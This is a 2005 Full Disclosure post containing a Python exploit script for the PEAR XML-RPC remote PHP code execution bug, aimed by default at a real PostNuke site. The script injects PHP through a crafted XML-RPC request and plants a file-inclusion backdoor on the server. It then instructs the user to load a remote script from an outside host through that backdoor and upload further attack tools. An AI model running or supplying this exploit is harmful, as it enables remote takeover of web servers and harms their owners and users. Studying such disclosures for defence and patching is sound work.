Full Disclosure - XMLRPC Exploit Code written in Python jul 2005
#!/usr/bin/python
# ./xmlrpc.py [chk|xpl] host uri
# example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php
# example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php
# Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working
for me
# so i made this python code
# http://pear.php.net/bugs/bug.php?id=4692
# Bug #4692 Remote Code Exection In XML RPC Server
# xmlrpc.pl http://pathtoxmlrpc/server
# "id;pwd;uname -a;uptime"
# [*] Sending command id;pwd;uname -a;uptime
# [*] Command sent, waiting for response
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# /var/www/drupal
# Linux cacophony 2.4.18-bf2.4 Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
# 23:27:22 up 5 days, 9:05, 0 users, load average: 0.12, 0.16, 0.21
# http://www.postnuke.com/xmlrpc.php
# by k3rn3lp4nic. greetz: albanian security clan!!! july 2005
import sys, httplib
try:
chose = sys.argv[1]
except IndexError:
chose = 'chk'
try:
host = sys.argv[2]
except IndexError:
host = 'www.postnuke.com'
try:
uri = sys.argv[3]
except IndexError:
uri = '/xmlrpc.php'
def check():
SoapMessage = """<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>','')); phpinfo(); exit;/*</name></value>
</param>
</params>
</methodCall>
"""
webservice = httplib.HTTP("%s" % host)
webservice.putrequest("POST", "%s" % uri)
webservice.putheader("Host", "%s" % host)
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke
k3rn37p4nic")
webservice.putheader("Content-type", "application/xml")
webservice.putheader("Content-length", "%d" % len(SoapMessage))
webservice.endheaders()
webservice.send(SoapMessage)
# get the response
statuscode, statusmessage, header = webservice.getreply()
print "Response: ", statuscode, statusmessage
print "headers: ", header
res = webservice.getfile().read()
print res
print 'If you see phpinfo dump data the you are succeful. proceed with
xpl!'
def xpl():
SoapMessage = """<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>',''));
echo 'start';
passthru('del xmlrpcpy.php');
$filename = 'xmlrpcpy.php';
$somecontent = '%?php include(~inc); ?#';
$somecontent = eregi_replace('%', chr(60), $somecontent);
$somecontent = eregi_replace('~', chr(36), $somecontent);
$somecontent = eregi_replace('#', chr(62), $somecontent);
$handle = fopen($filename,'w');
fwrite($handle, $somecontent);
fclose($handle);
passthru('dir');
passthru('type xmlrpcpy.php');
echo 'done';
exit;
/*</name></value>
</param>
</params>
</methodCall>
"""
webservice = httplib.HTTP("%s" % host)
webservice.putrequest("POST", "%s" % uri)
webservice.putheader("Host", "%s" % host)
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke
k3rn37p4nic")
webservice.putheader("Content-type", "application/xml")
webservice.putheader("Content-length", "%d" % len(SoapMessage))
webservice.endheaders()
webservice.send(SoapMessage)
# get the response
statuscode, statusmessage, header = webservice.getreply()
print "Response: ", statuscode, statusmessage
print "headers: ", header
res = webservice.getfile().read()
print res
print '\n\nExploit Successful!!!\nDownload
http://www.suneworld.com/programs/webexplorer20.zip'
print 'Rename index.php3 to index.txt and put it to some public host
http://somehost.com/index.txt'
print 'Now Accessed it like this: '
print
'http://victimhost/postnukewhatever/xmlrpcpy.php?inc=http://somehost.com/index.txt'
print 'Then upload your favorite haxor tools! Bye. Stay healthy!'
if __name__ == "__main__":
print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'
print 'revised it if you can! ver jul 2005'
print 'Greetz: Albanian Security Clan!!!'
print '---------------------------------------------'
print './xmlrpc.py [chk|xpl] host uri'
print 'example (check bug): ./xmlrpc.py chk www.postnuke.com
/xmlrpc.php'
print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com
/xmlrpc.php'
if chose=='chk':
check()
elif chose=='xpl':
xpl();
else:
print 'Boom! Script Kiddie'